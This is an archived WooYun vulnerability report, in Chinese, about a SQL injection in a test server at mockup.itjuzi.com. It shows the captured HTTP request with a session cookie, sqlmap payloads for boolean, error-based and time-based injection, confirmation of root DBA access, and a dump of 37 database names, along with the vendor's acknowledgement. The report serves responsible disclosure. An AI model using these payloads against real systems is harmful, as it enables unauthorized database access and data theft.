乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-16: 厂商已经确认,细节仅向厂商公开 2015-12-26: 细节向核心白帽子及相关领域专家公开 2016-01-05: 细节向普通白帽子公开 2016-01-15: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
天气冷了···
数据包:
GET /tag?id=651&location=* HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://mockup.itjuzi.com:80/Cookie: cisession=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2293b8cb1d511f9392264f1a5f2606129b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22218.205.17.133%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1450255709%3B%7D9257462ac115699729066f98f009bcbcHost: mockup.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
location 参数可注入
看了下 itjuzi 库
看了下权限 root 用户 DBA权限
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-5463' OR 6738=6738# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-4292' OR 1 GROUP BY CONCAT(0x716b7a7071,(SELECT (CASE WHEN (9723=9723) THEN 1 ELSE 0 END)),0x71767a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: http://mockup.itjuzi.com:80/tag?id=651&location=' AND (SELECT * FROM (SELECT(SLEEP(5)))dbtn)#---[17:35:12] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 7web application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0.12[17:35:12] [INFO] testing if current user is DBA[17:35:12] [INFO] fetching current user[17:35:13] [WARNING] reflective value(s) found and filtering out[17:35:13] [INFO] retrieved: root@%current user is DBA: True[17:35:14] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 2 times[17:35:14] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\mockup.itjuzi.com'[*] shutting down at 17:35:14
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 322 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-5463' OR 6738=6738# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://mockup.itjuzi.com:80/tag?id=651&location=-4292' OR 1 GROUP BY CONCAT(0x716b7a7071,(SELECT (CASE WHEN (9723=9723) THEN 1 ELSE 0 END)),0x71767a6271,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: http://mockup.itjuzi.com:80/tag?id=651&location=' AND (SELECT * FROM (SELECT(SLEEP(5)))dbtn)#---[17:16:23] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 7web application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0.12[17:16:23] [INFO] fetching database names[17:16:24] [INFO] the SQL query used returns 37 entries[17:16:24] [INFO] retrieved: information_schema[17:16:24] [INFO] retrieved: aidena[17:16:25] [INFO] retrieved: apple[17:16:25] [INFO] retrieved: apple_cn[17:16:26] [INFO] retrieved: avgouzai[17:16:26] [INFO] retrieved: bdxzjklt[17:16:27] [INFO] retrieved: blog_chktips[17:16:28] [INFO] retrieved: blogitjuzi[17:16:28] [INFO] retrieved: cciehunhun[17:16:29] [INFO] retrieved: chktips[17:16:31] [INFO] retrieved: dear_there[17:16:31] [INFO] retrieved: demo_chktips[17:16:32] [INFO] retrieved: dengta[17:16:32] [INFO] retrieved: dev_yahoo[17:16:33] [INFO] retrieved: itjuzi[17:16:33] [INFO] retrieved: itjuzidemo[17:16:34] [INFO] retrieved: jutongshe[17:16:34] [INFO] retrieved: kejiju[17:16:35] [INFO] retrieved: kids_db[17:16:35] [INFO] retrieved: letcodefly[17:16:36] [INFO] retrieved: meximexi[17:16:36] [INFO] retrieved: mysql[17:16:37] [INFO] retrieved: mysqlslap[17:16:37] [INFO] retrieved: nagios[17:16:38] [INFO] retrieved: psdhere[17:16:38] [INFO] retrieved: redmine[17:16:39] [INFO] retrieved: seeker[17:16:39] [INFO] retrieved: seeker_test[17:16:40] [INFO] retrieved: sochips[17:16:41] [INFO] retrieved: spider_article[17:16:41] [INFO] retrieved: ssmli[17:16:41] [INFO] retrieved: test[17:16:42] [INFO] retrieved: tobshe[17:16:42] [INFO] retrieved: touzishuju[17:16:43] [INFO] retrieved: wp_new[17:16:43] [INFO] retrieved: wp_new_2[17:16:44] [INFO] retrieved: zangelsavailable databases [37]:[*] aidena[*] apple[*] apple_cn[*] avgouzai[*] bdxzjklt[*] blog_chktips[*] blogitjuzi[*] cciehunhun[*] chktips[*] dear_there[*] demo_chktips[*] dengta[*] dev_yahoo[*] information_schema[*] itjuzi[*] itjuzidemo[*] jutongshe[*] kejiju[*] kids_db[*] letcodefly[*] meximexi[*] mysql[*] mysqlslap[*] nagios[*] psdhere[*] redmine[*] seeker[*] seeker_test[*] sochips[*] spider_article[*] ssmli[*] test[*] tobshe[*] touzishuju[*] wp_new[*] wp_new_2[*] zangels[17:16:44] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 295 times[17:16:44] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\mockup.itjuzi.com'[*] shutting down at 17:16:44
危害等级:高
漏洞Rank:10
确认时间:2015-12-16 18:15
big thanks , 测试服务器,无证运维管理,已打晕喂狗。
暂无